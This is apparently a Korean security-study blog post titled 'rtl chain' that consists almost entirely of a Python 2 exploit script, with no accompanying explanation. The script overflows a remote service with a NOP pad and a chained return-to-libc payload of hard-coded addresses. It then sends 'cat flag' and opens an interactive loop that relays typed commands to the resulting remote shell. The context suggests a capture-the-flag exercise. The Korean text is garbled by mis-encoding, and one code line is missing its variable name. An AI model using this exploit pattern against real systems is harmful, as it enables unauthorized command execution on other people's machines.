Security Study/Source

rtl chain

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 11. 21.
728x90
๋ฐ˜์‘ํ˜•
  1. from socket import *
  2.  
  3. HOST = ""
  4. PORT = 4444
  5.  
  6. = socket(AF_INET,SOCK_STREAM)
  7. s.connect((HOST,PORT)) #connect
  8.  
  9.  
  10. payload = "\x90"*260
  11. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"
  12. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"
  13. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"
  14. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x43\xa0\x04\x08"+"\xc2\x82\x04\x08"
  15. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x44\xa0\x04\x08"+"\x54\x81\x04\x08"
  16. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x45\xa0\x04\x08"+"\x99\x86\x04\x08"
  17. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x46\xa0\x04\x08"+"\x88\x86\x04\x08"
  18. payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x47\xa0\x04\x08"+"\xd4\x9f\x04\x08"
  19. payload += "\xc0\x83\x04\x08"+"AAAA"+"\x40\xa0\x04\x08"
  20.  
  21.  
  22. print s.recv(1024) #1024 byte read
  23. s.send(payload + "\n")
  24. print s.recv(1024)
  25. s.send("cat flag" + "\n")
  26. print s.recv(1024)
  27. while True:
  28.         cmd = raw_input("$")
  29.         s.send(cmd + "\n")
  30.         print s.recv(1024)
  31. print s.recv(1024)
  32. s.close()


728x90
๋ฐ˜์‘ํ˜•

'Security Study > Source' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

mac ํ„ฐ๋ฏธ๋„ vim ๊พธ๋ฏธ๊ธฐ  (0) 2015.12.10
sql injection reverse  (0) 2015.11.21
์†Œ์ผ“ํ”„๋กœ๊ทธ๋ž˜๋ฐ  (0) 2015.11.21
Blind Sql Injection  (0) 2015.11.21
Base 64 encoding  (0) 2015.11.21

๋Œ“๊ธ€